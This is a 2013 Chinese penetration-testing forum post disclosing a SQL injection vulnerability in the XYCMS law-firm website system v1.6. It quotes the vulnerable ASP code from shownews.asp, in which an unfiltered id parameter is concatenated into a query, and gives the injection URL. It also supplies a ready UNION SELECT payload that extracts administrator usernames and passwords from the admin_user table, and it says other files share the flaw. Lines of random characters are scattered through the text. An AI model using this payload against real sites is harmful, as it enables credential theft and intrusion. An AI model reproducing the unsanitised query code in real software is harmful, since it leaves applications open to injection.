中国网络渗透测试联盟
标题:
XYCMS律师事务所建站系统注入漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:28
标题:
XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
, m9 L' D3 Y- ?% j P
0 u# Y- d5 P" | x, X
淫荡分割线
: Y0 U# _( \1 C. H6 v5 z$ }7 k
--------------------------------------------------------
# P8 u6 r7 x. s! d) T
7 e8 i! [* A5 S
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
+ a3 _& u5 K# s9 _; N: L
源码地址:
http://down.chinaz.com/soft/29233.htm
' P/ c1 F# f; }3 P
% {+ G% u$ K* |0 f- }
漏洞文件:shownews.asp
+ z# C: z: g( t# {
漏洞代码:7-13行
- @, e8 \3 `3 ^
: q9 S0 K& X7 D x9 f$ j
/ W: q C+ l Q! K# S8 y3 p7 V" x7 o
<%
# r* L: D- E% B6 B, @0 `. l
id=request.QueryString("id")
B0 K/ u' S6 {
* U2 e9 y+ L6 d
set snews=server.createobject("adodb.recordset")
9 Z/ ?. w2 N& `7 D; n( j
exec="select * from [news] where id="&id
& d; V5 o, ?! g6 Z* n
snews.open exec,conn,1,1
8 E9 [% Q# B! R: G' X+ z$ u
%>
* w+ |6 o" c7 x
$ l8 L# A: H% b P
8 i% w4 B N5 h/ p% |# |
什么过滤都没有 直造成注入
9 L" H! |0 J2 F( }
& u' T" K3 D+ p' i$ v- D' u
注入点:
http://127.0.0.1:99/shownews.asp?id=xx
2 t9 t7 a+ q! `+ e2 v8 o7 }: H
5 N, U/ D. S1 v8 ?
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
) H( v- G+ D' W+ E& @0 t, a
7 w/ I/ b5 }# Z4 T h2 U
% m/ v; R" C$ w8 _( O" j/ k
exp: union select 1,admin,password,4,5,7 from admin_user
5 [9 ~: G9 S' b1 L
* r' m1 X+ I* n
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2